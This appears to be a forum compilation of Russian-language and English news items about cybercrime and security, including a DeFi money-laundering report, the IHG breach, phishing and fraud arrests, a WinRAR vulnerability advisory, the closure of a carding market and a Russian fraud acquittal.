Министерство финансов США выпустило отчет (https://home.treasury.gov/system/files/136/DeFi-Risk-Full-Review.pdf), который подчеркивает риски незаконных финансовых операций через DeFi-сервисы. Согласно отчету, преступники используют децентрализованные финансовые платформы для отмывания незаконно добытых средств.
Отчет указывает, что такие субъекты, как Корейская Народно-Демократическая Республика (КНДР), киберпреступники, вымогатели, воры и мошенники, могут использовать DeFi-сервисы для перевода и отмывания своих незаконных доходов.
Основная уязвимость, которую злоумышленники используют, связана с несоблюдением DeFi-сервисами санкционных ограничений и правил противодействия отмыванию доходов, полученных преступным путем, и финансированию терроризма (ПОД/ФТ), отмечают авторы отчета. Они также подчеркивают, что DeFi-сервисы, будучи децентрализованными, все равно подлежат Закону о банковской тайне и должны соблюдать требования ПОД/ФТ.
Министерство финансов рекомендует усилить регуляторный надзор и призывает частные компании разрабатывать собственные инструменты для снижения рисков нарушений и злоупотреблений DeFi-сервисами.
Тем не менее, авторы отчета признают, что объем незаконной деятельности в сфере DeFi остается незначительным по сравнению с традиционными финансами. Они отмечают, что отмывание денег и финансирование терроризма чаще всего осуществляются с использованием фиатной валюты или других традиционных активов, а не виртуальных активов, и составляют лишь часть деятельности в сфере DeFi.
Заработать на атаке злоумышленники не смогли, но успели удалить огромный объем данных.
Согласно заявлению компании IHG, владеющей более чем 6 000 отелей под брендами Regent, Holiday Inn и Crowne Plaza, ее система была взломана днем 5 сентября. Потом, на протяжении 24 часов IHG ничего не сообщала об инциденте, оправдывая сбои при бронировании и регистрации “техническим обслуживанием”. Публично об инциденте стало известно 6 сентября, когда компания проинформировала инвесторов о случившемся.
Вину за произошедшее на себя взяли хакеры под ником TeaPea, представившиеся вьетнамской семейной парой. Киберпреступники связались с BBC через Telegram и предоставили скриншоты, на которых видно, что им удалось получить доступ к корпоративной почте Outlook, командам Microsoft Teams и каталогам сервера компании. IHG подтвердила правдивость этих скриншотов.
Атака проходила следующим образом:
Хакеры заявили, что никак не связаны с нарушениями работы сервисов IHG, а их атака не нанесет большого вреда компании. Кроме того, им не удалось украсть личную информацию клиентов – в руки злоумышленников попали только некоторые бизнес-данные компании.
Самым интересным в этой истории является то, что паролем от внутреннего хранилища паролей компании была крайне слабая комбинация – Qwerty1234. Однако представитель IHG отрицает это и говорит, что информация в хранилище паролей была надежно защищена.
В грядущей iOS 14.5, которая выйдет в ближайшие месяцы, появится функция, которая перенаправит весь Safe Browsing трафик Safari через прокси-серверы, контролируемые Apple. Таким образом в компании хотят сохранить конфиденциальность пользователей и не позволить Google узнать их IP-адреса.
Сначала информация о новой функции появилась на Reddit, но вскоре эти слухи подтвердил глава отдела разработки Webkit Мацей Стаховяк (Maciej Stachowiak).
Новая функция будет работать лишь в том случае, если пользователь активировал опцию Fraudulent Website Warning («Предупреждать о мошеннических сайтах») в настройках Safari. Эта опция обеспечивает поддержку технологии Safe Browsing от Google.
Safe Browsing работает просто: проверяет любой URL-адрес, к которому пользователь пытается получить доступ, отправляя этот URL-адрес (в анонимизированном виде) на серверы Google, а затем системы компании получают доступ к сайту и сканируют его на наличие угроз. Если на сайте обнаружены малварь, фишинговые формы и другие угрозы, Google сообщает Safari пользователя, что нужно блокировать доступ к сайту и показывает полноэкранное предупреждение.
Несколько лет назад, когда в Google только запустили API Safe Browsing, компания «видела», к каким сайтам обращается пользователь. Однако потом разработчики предприняли ряд шагов для анонимизации этих данных. Тем не менее, Google по-прежнему знает IP-адрес, с которого приходит запрос на проверку Safe Browsing.
«Проблема в том, что Update API Safe Browsing никогда не был безопасным. Его цель заключалась не в в обеспечении полной конфиденциальности для пользователей, а скорее в ухудшении качества данных, которые собирают провайдеры», — еще в 2019 году писал известный криптограф и профессор университета Джонса Хопкинса Мэтью Грин (Matthew Green).
Click to expand...
Новая функция Apple будет передавать все запросы Safe Browsing через собственный прокси-сервер Apple, и в результате все они будут выглядеть как поступающие с одного и того же IP-адреса.
Источник: xakep.ru/2021/02/15/apple-vs-safe-browsing/
Участники проекта Tor [разработали](https://blog.torproject.org/anonymous- gitlab) Anon-Ticket, надстройку для платформы совместной разработки GitLab, позволяющую анонимно отправлять сообщения о проблемах и участвовать в их обсуждении, без необходимости регистрации учётной записи. Код написан на языке Python с использованием фреймворка Django. В тестовом режиме запущен сервис, позволяющий отправлять сообщения о проблемах в репозиториях Tor, но надстройка не привязана к Tor и может применяться в других проектах.
Часто пользователи, пожелавшие сообщить разработчикам о проблеме, отказываются от своего намерения, столкнувшись с необходимостью заполнения дополнительных регистрационных форм, передачи персональных данных или ожидания подтверждения. Anon-Ticket позволят обойтись без регистрации, которая излишня при отправке единичных уведомлений, избавиться от ожидания подтверждения учётной записи модератором и сохранить свои персональные данные и email в тайне.
Anon-Ticket позволяет не только отправлять, но и отслеживать состояние заполненных тикетов и публиковать уточнения, для чего пользователю выдаётся автоматически сгенерированный временный идентификатор и ссылка на страницу, которую можно добавить в закладки для контроля за своим тикетом. Также в интерфейсе доступны функции просмотра имеющихся проектов и поиск связанных с выбранным проектом тикетов. Для предотвращения спама и злоупотреблений применяется механизм премодерирования публикаций.
Модераторам предоставлены гибкие инструменты для подтверждения или отклонения ожидающих публикаций в пакетном режиме, а также возможность внесения правок и оставления комментариев, видимых только другим модераторам. Из планов на будущее упоминается создание onion-сервиса, добавление дополнительных механизмов защиты, таких как ограничение интенсивности отправки сообщений, и реализация возможности трансформации анонимного участника в обычного (например, когда пользователь решил полноценно подключиться к разработке, зарегистрировал учётную запись GitLab и пожелал перенести в неё свои старые анонимные обсуждения).
Злоумышленник получал банковские данные пользователей с помощью собственноручно созданных фишинговых ресурсов. Фигурант присвоил деньги потерпевших под видом предоставления услуг онлайн-перевода. За такие действия ему грозит до восьми лет заключения.
Правонарушителя выявили сотрудники отдела противодействия киберпреступлений в Винницкой области совместно с детективами следственного управления областной полиции.
Кіберполіція установила, что 31-летний местный житель разработал фишинговые сайты, где якобы предоставлялись услуги онлайн-перевода денег.
Мужчина использовал платные маркетинговые и аналитические ресурсы, чтобы его сайты выводились на первые позиции поисковых сервисов.
Фигурант получал банковские данные пользователей, которые пытались осуществить платежные операции на таких сайтах. Далее, используя эти данные, злоумышленник присваивал деньги со счетов.
По предварительным данным, гражданам нанесен более миллиона гривен убытков. Сейчас правоохранители устанавливают потерпевших.
В доме и в автомобиле фигуранта сотрудники полиции провели обыски. Изъято компьютерную технику, мобильные телефоны, банковские карты и жесткие диски. Все изъятое направлено на проведение соответствующих экспертных исследований.
Открыто уголовное производство по ч. 3 ст. 190 (Мошенничество) Уголовного кодекса Украины. Санкция статьи предусматривает до восьми лет лишения свободы. Продолжаются следственные действия.
Интерпол объявил об аресте в Кот-д’Ивуаре восьми человек, которые стоят за масштабной фишинговой атакой, направленной против жителей Швейцарии. Подозреваемые попали в руки силовиков в рамках продолжающейся уже три года спецоперации Contender 2.0.
«В кампании, которая привела к краже более 1,4 миллиона долларов, участвовали преступники, выдававшие себя за покупателей на небольших маркетплейсах. Мошенники использовали QR-коды, чтобы направлять жертв на фишинговые сайты, имитировавшие платежную платформу, на которой жертвы вводили свои данные и номера карт. Также преступники выдавали себя за сотрудников службы поддержки в телефонных разговорах»
Click to expand...
Всего с августа 2023 года по апрель 2024-го власти Швейцарии получили более 260 сообщений о мошенничестве. На основе разведданных Интерпола ивуарийское киберподразделение провело расследование, установив местонахождение главного подозреваемого, который был арестован. Кроме того, были задержаны его подельники, принимавшие участие в той же кампании. Следователи сейчас ищут других жертв, а также пытаются вернуть жертвам украденные деньги.
interpol.int/en/News-and-Events/News/2024/Arrests-in-international-operation- targeting-cybercriminals-in-West-Africa
Масштабная международная операция по борьбе с организованной преступностью и кибермошенничеством, берущими начало в Западной Африке, завершилась впечатляющими результатами. Как сообщил Интерпол в среду, правоохранители задержали 300 подозреваемых на пяти континентах.
Операция под кодовым названием Jackal III проводилась с 10 апреля по 3 июля 2023 года. За этот период стражи порядка изъяли активы на сумму 3 миллиона долларов и заморозили 720 банковских счетов, предположительно используемых в преступных целях.
Исаак Огинни, возглавляющий Центр по борьбе с финансовыми преступлениями и коррупцией Интерпола, выразил серьезную обеспокоенность: "Размах финансовых махинаций, исходящих из Западной Африки, вызывает тревогу и продолжает расти". Он подчеркнул, что противостоять разветвленным преступным сетям можно только объединенными усилиями разных стран.
Особое внимание в ходе операции было уделено группировке "Black Axe" - нигерийской преступной организации с многолетней историей. Интерпол характеризует "Black Axe" как один из наиболее влиятельных западноафриканских преступных синдикатов, действующих на международной арене. Группировка занимается широким спектром противоправной деятельности, включая кибермошенничество, торговлю людьми, наркобизнес и другие тяжкие преступления как на африканском континенте, так и за его пределами.
Для проведения своих махинаций преступники задействовали банковские счета по всему миру. В настоящее время правоохранительные органы 40 стран ведут расследования, связанные с отмыванием денег этой группировкой.
Стоит отметить, что еще в 2021 году американские правоохранители провели масштабную операцию в Техасе, задержав 33 человека, предположительно связанных с этой криминальной сетью. Подозреваемым были предъявлены обвинения в целом ряде преступлений, включая взлом деловой переписки, мошенничество в отношении инвесторов и незаконные операции с пособиями по безработице. Следствие установило, что злоумышленники сумели похитить и отмыть более 17 миллионов долларов, обманув не менее сотни жертв.
Взлом деловой переписки (BEC) считается одним из наиболее разорительных видов киберпреступлений. По оценкам ФБР, с июня 2016 по декабрь 2021 года общемировой ущерб от таких атак достиг колоссальной суммы в 43 миллиарда долларов.
Успех Jackal III ярко демонстрирует, насколько эффективным может быть международное взаимодействие в борьбе с организованной преступностью. По мнению экспертов, результаты операции нанесли серьезный удар по влиянию и возможностям криминальных структур, что должно значительно снизить их способность наносить ущерб обществу в глобальном масштабе.
• Source: securitylab.ru/news/550273.php
• Source: https://www.interpol[.]int/en/News-and-Events/News/2024/INTERPOL- operation-strikes-major-blow-against-West-African-financial- crime?ref=metacurity.com
В популярная утилите для сжатия и архивации файлов в операционных системах Windows, WinRAR обнаружена критическая уязвимость CVE-2023-40477, позволяющая выполнить произвольный код на системе целевого пользователя.
Проблема связана с недостаточно проверкой данных, предоставленных пользователем, в процессе работы с томами восстановления.
Исследователь под псевдонимом "goodbyeselene" из Zero Day Initiative сообщил об уязвимости компании RARLAB 8 июня 2023 года
Официальный совет ZDI гласит : «Эта уязвимость позволяет удалённым злоумышленникам выполнять произвольный код на затронутых установках RARLAB WinRAR. Для эксплуатации уязвимости требуется взаимодействие пользователя, так как цель должна посетить вредоносную страницу или открыть вредоносный файл. Конкретный недостаток существует в обработке томов восстановления. Проблема происходит из-за отсутствия надлежащей проверки данных, предоставленных пользователем, что может привести к доступу к памяти за пределами выделенного буфера. Злоумышленник может использовать эту уязвимость для выполнения кода в контексте текущего процесса».
WinRAR устранила недостаток с выпуском версии 6.23. Пользователям WinRAR настоятельно рекомендуется обновить свои установки до новой версии, прежде чем злоумышленники начнут использовать уязвимость в атаках.
Девушка из Северной Каролины продавала поддельные карты социального страхования, сертификаты о вакцинации от COVID-19 и водительские права прямо на своей страничке в Facebook. 23-летняя Чайя Мэйли-Джексон (Chaiya Maley- Jackson) также создала два сайта для своей компании, которую она назвала Diva Documents.
По версии прокуратуры, менее чем за три года Мэйли-Джексон заработала более 320 тысяч долларов от своей мошеннической схемы. За это время ей удалось продать 400 карточек социального страхования, восемь водительских прав и шесть сертификатов вакцинации от COVID-19. Кроме того, она как минимум предлагала свои услуги в создании цифровых и бумажных версий фальшивых квитанций о заработной плате, договоров аренды, писем о трудностях из-за COVID-19, банковских выписок, а также различных форм.
Девушка брала за свои услуги предоплату в размере половины стоимости работы, а после ее окончания высылала документ в цифровом виде, настаивая на переводе оставшейся суммы. Вскоре после получения денег Мэйли-Джексон направляла документы почтой. Оплата принималась через Cash App, Zelle, PayPal, Apple Pay и Venmo.
Сторона обвинения также настаивает на том, что Мэйли-Джексон была прекрасно осведомлена о вариантах применения изготовленных ею документов. В частности, клиенты девушки с их помощью оформляли заявки на кредиты, на помощь в связи с COVID-19, автокредиты, аренду квартир и многое другое. Девушка полностью признала вину и сотрудничает со следствием. Она выпущена под залог, а максимальное наказание может составить 15 лет заключения.
source news.yahoo.com/woman-made-320k-selling-fake-162231115.html
На территории Республики Молдова задержаны 12 участников организованной преступной группы, среди которых двое украинцев. В мошеннических колл-центрах работало около 400 наемных работников. Согласно разработанной мошеннической схеме, которая функционировала с 2021 года, аферисты через объявления в интернете предлагали пострадавшим, преимущественно гражданам Румынии, сделать инвестиции с обещанием безопасного и быстрого заработка. Согласно молдавскому уголовному законодательству задержанным грозит наказание в виде лишения свободы на срок до 15 лет.
В рамках международного сотрудничества оперативники Департамента стратегических расследований, следователи Главного следственного управления Нацполиции под процессуальным руководством Офиса Генерального прокурора в сотрудничестве с Европолом, Евроюстом и правоохранительными органами Республики Молдова и Румыния ликвидировали деятельность преступной группировки, члены которой «специализировались» на выманивании денег у доверчивых граждан с помощью колл-центров.
К организации масштабной международной мошеннической схемы причастны граждане Украины, которые совместно с представителями других государств обеспечивали работу четырех колл-центров на территории нескольких городов Республики Молдова, штат которых насчитывал около 400 человек.
Действовали злоумышленники по следующей схеме: дельцы на интернет-сайтах создавали объявления, где предлагали гражданам возможность безопасного, быстрого, а главное высокого заработка после осуществления небольших инвестиций. Изображенные в рекламных объявлениях знаменитости или официальные логотипы крупных местных банков вызвали у потенциальных жертв доверие, что позволило фигурантам обмануть большое количество человек. Реклама содержала ссылку на веб-сайт, после перехода на который потенциальным «клиентам» предлагали быстро получить доход. В регистрационной форме «инвесторы» указывали личные данные, а далее непосредственно на указанном сайте создавали собственный счет для вложений в несуществующие финансовые продукты.
Сверхприбыли доверчивые граждане должны были получить сразу после «инвестиции» в размере 250 долларов или евро в акции или виртуальные валюты, которые они делали через онлайн-торговые платформы. С помощью программного интерфейса дельцы имитировали проведение дополнительных начислений и рост прибыли в сотни раз. Под видом финансовых консультантов, экспертов или страховых брокеров с потенциальными жертвами также связывались работники колл-центра, которые уверяли в надежности рекламной «схемы».
Следующим шагом аферисты предлагали установить потерпевшим на свои телефоны мобильные приложения, которые позволяли участникам преступной группы получить доступ к банковским счетам потерпевших и переводили с них деньги. Таким же образом мошенники действовали с учетными записями жертв, открытыми на платформах виртуальных валют.
Если потерпевшие отказывались продолжать инвестиции, злоумышленники прибегали к различного рода угрозам. Операторы колл-центров в возрасте от 20 до 45 лет для допуска к работе с гражданами проходили многоэтапный тщательный отбор, включавший даже проверку на полиграфе. Также обязательным условием для принятия «на работу» было совершенное владение иностранными языками.
Несколько участников организованной группы выступали в роли надзирателей, руководителей команд и администраторов, которые тщательно следили за работой операторов колл-центров.
7 августа правоохранители Украины, Молдовы и Румынии одновременно провели спецоперацию для ликвидации мошеннической схемы, несколько из организаторов которой были украинцы. Всего на территории Республики Молдова задержаны 12 участников организованной преступной группы, в том числе двое граждан Украины.
Так, на территории нескольких стран состоялось около 70 обысков в помещениях колл-центров и офисных зданиях, а также по местам проживания и в автомобилях фигурантов - 9 из них в Украине.
В результате мероприятий полицейские изъяли более 100 компьютеров, системные блоки, десятки телефонов, банковские карты, огнестрельное оружие, 10 автомобилей, а также около 35 000 долларов. В Киеве украинские правоохранители изъяли компьютерную технику, средства связи, а также более 2,4 млн грн в гривневом эквиваленте.
Сейчас в Румынии «схема» расследуется по 120 уголовным производствам на основе 150 заявлений обманутых лиц. Установлено, что по мошеннической схеме злоумышленники обманули потерпевших на 1 200 000 евро.
Продолжается сбор доказательной базы для установления полного круга причастных к преступлению лиц и привлечения их к уголовной ответственности. В соответствии с законодательством Республики Молдова, задержанным фигурантам грозит от 8 до 15 лет за решеткой.
Следствие продолжается.
В рамках уголовного дела, возбужденного следователем СУ УМВД России по г. Владивостоку по ч. 3 ст. 272 УК РФ «Неправомерный доступ к компьютерной информации, совершенный лицом с использованием своего служебного положения», установлена причастность сотрудника одной из компаний сотовой связи к неправомерному доступу к защищенной законом компьютерной информации.
Противоправная деятельность 32-летнего жителя Владивостока пресечена сотрудниками отдела по борьбе с противоправным использованием информационно- коммуникационных технологий Управления МВД России по Приморскому краю.
Установлено, что житель Владивостока, являясь сотрудником компании сотовой связи, воспользовался базами данных мобильного оператора и получил неправомерный доступ к защищенной законом компьютерной информации, а также осуществил вход в программу, обеспечивающую доступ к персональным данным граждан, что повлекло модификацию и копирование информации. Затем по копиям паспортов абонентов подозреваемый регистрировал и реализовывал сим-карты без участия граждан. Впоследствии они использовались в противоправных целях.
Ранее сотрудники полиции совместно с коллегами из регионального УФСБ России задержали троих жителей Владивостока, подозреваемых в применении технических устройств GSM-шлюзов и сим-боксов. С помощью специального оборудования злоумышленники совершали противоправные действия в отношении граждан Российской Федерации, а именно неправомерно получали доступ к личным кабинетам жителей разных регионов России на портале Госуслуг.
В отношении приморцев возбуждено уголовное дело по ч. 3 ст. 30, ч. 1 ст. 272 УК РФ «Покушение на неправомерный доступ к компьютерной информации». По местам жительства подозреваемых проведены обыски, в ходе которых изъяты 688 сим-карт, системные блоки, жесткие диски, мобильные телефоны, ноутбуки, банковские карты различных финансовых организаций, роутеры, сим-боксы и сим-банки.
Расследование уголовных дел продолжается.
• Video: https://мвд[.]рф/news/item/52893049/
Австралийская федеральная полиция арестовала женщину, которую подозревают в email-бомбардировке офиса неназванного члена федерального парламента страны. Сообщается, что за сутки женщина отправила более 32 000 электронных писем в офис парламентария, из-за чего сотрудники не могли нормально пользоваться ИТ- системами, а люди не могли связаться с офисом.
«Полиция утверждает, что эта женщина использовала несколько доменов для отправки 32 397 электронных писем в течение 24 часов до ее ареста, что привело к возникновению постоянных сбоев и помех в работе», — поясняют правоохранители.
Теперь обвиняемой будет предъявлено обвинение в совершении несанкционированного нарушения работы электронных коммуникаций. Максимальное наказание, предусмотренное за такое правонарушение, — десять лет лишения свободы.
Судя по тому, что в заявлении полиции упоминаются несколько доменов, использованных для отправки писем, похоже, подозреваемая воспользовалась неким сервисом для email-бомбинга, который позволил осуществить «почтовую DDoS- атаку», отправив множество электронных писем с разных адресов.
Многие из таких сервисов умеют обходить спам-фильтры и обычно рекламируются в даркнете или на хакерских форумах.
Также подозреваемая могла использовать специальные скрипты, которые автоматизируют регистрацию аккаунтов на множестве сайтов, используя для этого почтовый адрес жертвы. В итоге сообщения о подтверждении регистрации могли массово приходить в почтовый ящик офиса парламентария. Поскольку регистрация на таких сайтах, равно как и они сами, является настоящей, сообщения от них тоже благополучно обходят спам-фильтры.
• Source: [https://www.afp.gov.au/news-media/m...arged-alleged-cyber-attack- against-federal-mp](https://www.afp.gov.au/news-media/media-releases/woman- charged-alleged-cyber-attack-against-federal-mp)
На прошлой неделе мы рассказывали о том, что разработчики браузеров Vivaldi и Brave, DuckDuckGo и Electronic Frontier Foundation выступили против технологии Federated Learning of Cohorts (FLoC) от Google и представили инструменты для ее блокировки.
Дело в том, что недавно компания Google объявила о планах по внедрению функции FLoC, которая должна будет заменить собой сторонние файлы cookie, использующиеся рекламными сетями и аналитическими платформами для отслеживания пользователей.
FLoC сразу же раскритиковали эксперты EFF, назвав ее «ужасной идеей», ведь Chrome, по сути, будет делиться сводкой недавней активности каждого пользователя с маркетологами. По словам специалистов, с внедрением FLoC Google попросту заменяет один риск для конфиденциальности пользователей другим.
Теперь недовольство FLoC выразили и разработчики WordPress. Они пишут, что рассматривают новую технологию как проблему безопасности и могут заблокировать ее по умолчанию на сайтах под управлением своей CMS.
Разработчики обеспокоены тем, что многие люди вообще не знают о новой технологии отслеживания и автоматически разрешат ее работу, не вполне понимая, что это решение повлечет за собой. Из-за этого, в интересах пользователей, авторы WordPress предлагают автоматически отключать FLoC.
«WordPress поддерживает примерно 41% интернета, и это сообщество может помочь бороться с расизмом, сексизмом, дискриминацией против ЛГБТК+ и дискриминацией людей с психическими заболеваниями с помощью всего четырех строк кода», — пишут разработчики.
Click to expand...
WordPress планирует блокировать FLoC с помощью четырех строк кода, в результате чего CMS будет отправлять специальный хэдер HTTP-запроса, сообщающий браузеру, что FLoC следует отключить для данного сайта.
Сообщается, что при желании администраторы смогут включить эту технологию. Предполагается, что те, кто знает о FloC и захотят ее использовать, сами разберутся с включением. Но также предлагается добавить в WordPress настройку, позволяющую администраторам контролировать, разрешен ли FLoC.
Обновления планируют внести в WordPress 5.8, выпуск которого запланирован на июль 2021 года, но пока разработчики запрашивают у сообщества обратную связь и приглашают всех желающих к обсуждению. Также рассматривается возможность внедрения блокировки FLoC в более ранние версии CMS.
Источник: xakep.ru/2021/04/19/wordpress-floc/
One of the most popular dark web card bazaars, ‘ValidCC,’ has shut down quite suddenly, and the signs indicate law enforcement involvement. The particular market wasn’t only accepting cards or providing a place where crooks could trade their goods, but instead had a team that performed the actual hacking and payment card data stealing. This way, ValidCC could guarantee that the sold packs were really “pure/fresh,” unused, and oftentimes undetected.
[](https://cdn.technadu.com/wp-
content/uploads/2021/02/validcc_screenshot.png)
Source: KrebsOnSecurity
Investigative journalist Brian Krebs has found posts from someone who claims
to be ValidCC’s head of operations, using the nick “SPR,” and who posted
several messages on various darknet forums. On January 28, 2021, the user
informed customers that the shop would close because law enforcement agents
managed to disrupt its operations.
Allegedly, the main servers were taken down, and they took the proxy and destination backup with them. The database and backend, which are strongly encrypted, are in the hands of the police and no longer accessible by the operators.
[](https://cdn.technadu.com/wp-
content/uploads/2021/02/shop-down.jpg)
Source: KELA
It means that about 600,000 unsold stolen payment card accounts were lost
forever, and so did the customer balances. To use ValidCC, people had to fill
up their wallets with Bitcoin, so this abrupt shutdown incurred the loss of
these amounts.
“SPR” says that should be about $100,000 worth of crypto deposits, which is obviously not retrievable anymore. Naturally, many “customers” of ValidCC voiced suspicions of a pretentious exit scam, while others were shocked by the news, fearing prosecution.
To both, SPR answered:
“We don’t know anything! We don’t know users’ balances, or your account logins or passwords, or the [credit cards] you purchased, or anything else! You are free to think what you want, but our team has never conned or let anyone down since the beginning of our operations! Nobody would abandon a dairy cow and let it die in the field! We did not take this decision lightly!”
Click to expand...
While we have no way to tell if SPR’s claims are truthful or not, we know that we’re going through a period of intense law enforcement action against large dark web platforms, so it all seems plausible. Following [the closure of ‘Joker’s Stash’](https://www.technadu.com/jokers-stash-carding-marketplace- announced-shutdown/241123/) two weeks ago, the future of carding in general [seemed bleak](https://www.technadu.com/downfall-jokers-stash-turning-point- avcs/243947/), but this space is still far from being dead.
With the help of specialized tools by KELA, we performed a sweeping on recent dark web conversations and found signs that former members of ValidCC are already happily using alternatives.
[](https://cdn.technadu.com/wp- content/uploads/2021/02/other-options.jpg)
Source : <https://www.technadu.com/validcc-dark-net-card-bazaar-taken-offline- possibly-police/245674/>
Krebsonsecurity as well : https://krebsonsecurity[.]com/2021/...aar-and- looter-of-e-commerce-sites-shuttered/
Суд указал, что регистрация на криптовалютной бирже и оформление карты на третье лицо, на которую поступили средства потерпевшего, а затем были переведены пользователям биржи, не свидетельствуют об умышленном пособничестве в мошенничестве.
В комментарии «АГ» один из защитников поделился, что самым сложным было донести до суда, как работает криптоплатформа и что такое р2р-арбитраж. Другой посчитал, что принятый судебный акт о невиновности подзащитных еще раз доказывает, что принцип состязательности сторон существует и успешно применяется на практике.
Как стало известно «АГ», 27 сентября Димитровградский городской суд Ульяновской области вынес оправдательный приговор в отношении двоих мужчин по обвинению в совершении преступлений по ч. 5 ст. 33, ч. 3 ст. 159 УК РФ, т.е. в пособничестве мошенничеству, совершенном в крупном размере. Защитники оправданных, адвокаты московской коллегии адвокатов «Спектр права» Роман Гончаров и Асим Алыев рассказали «АГ» о нюансах дела.
По версии следствия, неустановленные лица вступили в сговор с целью хищения денежных средств в крупном размере путем обмана по телефону, представляясь сотрудниками правоохранительных органов и требуя передачи денежных средств под предлогом их сохранения от мошенников, для чего привлекли А. и Б. А. занимался поиском банковских счетов и карт к ним, оформленных на третьих лиц, и давал указания о переводе денежных средств на карты соучастников. Б. искал третьих лиц для оформления на них банковских счетов и карт к ним, руководил ими, а также получал реквизиты для последующих переводов.
Не позднее 30 мая 2022 г. Б. дал указание А. оформить за денежное вознаграждение банковскую карту на не осведомленное о преступном умысле соучастников лицо. А. убедил знакомого О. за 1 тыс. руб. оформить на свое имя банковскую карту, после чего передать в пользование Б. Затем А., получив карту, подключил к ней находящийся в его пользовании номер, после чего передал реквизиты карты Б.
3 июня 2022 г. неустановленные лица, представляясь сотрудниками СК РФ, звонками и перепиской в мессенджере Whatsapp убедили П. перевести 1 млн руб. на подконтрольные им счета. П. оформил кредит, после чего внес деньги на свой расчетный счет. Далее он перевел их со своего счета на расчетный счет О. Затем А. перевел поступившие деньги по реквизитам карт, подконтрольных участникам преступной группы, два раза по 400 тыс. руб. на один счет и 200 тыс. руб. на второй счет, тем самым похитив их, распорядившись ими по своему усмотрению, причинив П. ущерб на 1 млн руб.
В суде А. и Б. отрицали свою осведомленность как о преступном умысле неустановленных лиц на мошенничество, так и об оказании ими содействия в реализации этого преступного умысла.
Б. указал, что в начале 2022 г. зарегистрировался и согласился с условиями пользовательского соглашения на бирже криптовалют Garantex, на которой можно покупать и продавать криптовалюту. На платформе покупатель может выбирать продавца с наиболее выгодными условиями и выходить на сделку (P2P). В июне 2022 г. к нему на сделку вышел постоянный покупатель под никнеймом «D...28». На тот момент у Б. было криптовалюты на 1 млн руб. Так как банки быстро блокируют карты, Б. через А. попросил О. оформить на себя карту, пояснив, что деятельность связана с криптобиржей. Б. направил покупателю реквизиты карты О. для зачисления денежных средств.
Когда «D...28» перевел 1 млн руб., Б. совершил две сделки по покупке криптовалюты на 800 тыс. у одного продавца и сделку на 200 тыс. у другого, заработав на этом около 60 тыс. руб. Б. рассказал, что на платформе Garantex он не может проверить и не проверял происхождение поступивших на счет денежных средств.
А. пояснил, что в июне 2022 г. Б. попросил его оформить карту, объясняя тем, что занимается криптовалютой на бирже и никаких противозаконных действий не будет. Он согласился и сказал, что у него есть кредитная карта. Б. предупредил, что карту могут заблокировать, тогда А. попросил О. помочь в открытии карты. О. согласился, оформил карту и передал ее А., а тот сообщил реквизиты Б. Когда деньги пришли, А. перевел средства два раза по 400 тыс. руб. на один счет и 200 тыс. руб. – на другой. За оказанную помощь Б. дал 2 тыс. руб., из которых 1 тыс. А. отдал О. Больше Б. к нему с просьбами не обращался.
Свидетель О. рассказал, что в начале июня 2022 г. его знакомый А. попросил оформить банковскую карту для покупки ценных бумаг, заверив, что это законно. О. согласился и в тот же день оставил заявку на выпуск и оформление дебетовой банковской карты. 3 июня 2022 г. курьер привез карту, которую О. передал вместе с приложенными документами А., получив за это 1 тыс. руб. Спустя некоторое время ему позвонили из банка и сообщили, что на его счет поступили денежные средства в сумме меньше миллиона рублей, которые будут заблокированы. А. позвонил с номера О. в банк, консультанты которого сообщили, что деньги будут разблокированы и поступят на его расчетный счет. Он не был против этого.
Потерпевшая – жена П. указала: вечером 3 июня 2022 г. П. рассказал, что ему позвонил человек, представившийся сотрудником СК РФ, который сообщил, что человек по фамилии Сидоров пытался взять кредит на его имя. Кредит ему оформили, но не выдали, и П. должен сам обратиться в банк и снять деньги, иначе они будут отправлены мошенникам. После этого ему позвонила женщина, представилась сотрудником Центрального Банка РФ и сообщила, что ему необходимо снять деньги и перевести их на «резервный» счет, что П. и сделал. Он взял кредит, в другом банке ему был открыт счет, и он перевел через него 1 млн руб. на счет А. Поняв, что это мошенничество, П. с женой поехали в банк, но тот уже был закрыт. Дозвонившись на горячую линию, П. оставил заявление на отмену операции по переводу денежных средств. На следующий день П. поехал в банк, где написал заявление о мошеннических действиях. 4 июня 2022 г. жена П. получила сообщение о том, что тот покончил жизнь самоубийством.
Свидетель Л. сообщил, что с ноября 2021 г. по декабрь 2022 г. работал на криптовалютной бирже Garantex, для регистрации на которой необходимо пройти верификацию и подписать пользовательское соглашение. На бирже он покупал криптовалюту дешевле, а продавал дороже. Иногда постоянные покупатели переводили денежные средства до открытия сделки на бирже ввиду того, что у него как у продавца либо не было криптовалюты, либо она была заморожена. На эти денежные средства он закупал криптовалюту и переводил покупателям. В таких случаях рискует только покупатель. Процент от сделки устанавливают сами продавец и покупатель. Доход заключается в разнице курсов между покупкой и продажей. Л. указал, что он обучал Б. работе на бирже и знал пользователя «D...28», который был постоянным клиентом. «D...28» являлся обменным сервисом, к нему обращались клиенты за покупкой крипотовалюты, после чего он открывал сделки по покупке криптовалюты, в том числе и с ним. Всего с пользователем «D...28» он совершил около 100 сделок. Из-за большого оборота денежных средств банковские карты блокировались. У продавца согласно пользовательскому соглашению нет обязанности проверять происхождение денежных средств у покупателя, биржа Garantex гарантирует, что сделка проходит в рамках закона.
Рассмотрев материалы дела, суд посчитал, что обвинение не представило данные, свидетельствующие об осведомленности Б. и А. о совершаемых мошеннических действиях в отношении П. и их роли как пособников в этом. Он отметил, что согласно ответу из криптоплатформы Garantex Б. на криптоплатформе осуществляет сделки с цифровыми знаками, 28 января 2022 г. была зарегистрирована учетная запись клиента «В…С», посредством которой Б. 3 июня 2022 г. осуществил сделку по купле-продаже криптовалюты. Продавец получил оплату в размере 1 млн руб., финансовый актив в размере около 934 тыс. руб. криптовалюты был зачислен на аккаунт пользователя «D...28». Л. осуществляет сделки по купле-продаже крипты, в том числе с использованием для переводов денежных средств своего счета. С 15 ноября 2021 г. по 7 июля 2023 г. количество завершенных сделок составило 3161 с 740 различными контрагентами, в том числе с «D...28».
Как указал суд, доказательства, свидетельствующие о том, что Б. и А. вступили с неустановленными лицами в сговор, направленный на хищение денежных средств П. в крупном размере, путем обмана, умышленно способствовали совершению хищения, в материалах дела не содержатся и государственным обвинителем не приведены. То обстоятельство, что Б. по состоянию на 3 июня 2022 г. был зарегистрирован на бирже «Garantex» и А. по просьбе последнего просил оформить О. карту, которую тот оформил и передал А. и на которую впоследствии поступили денежные средства П., переведенные потом О. по просьбе Б. пользователям биржи, не свидетельствует об их умысле на оказание содействия неустановленным лицам в совершении мошенничества.
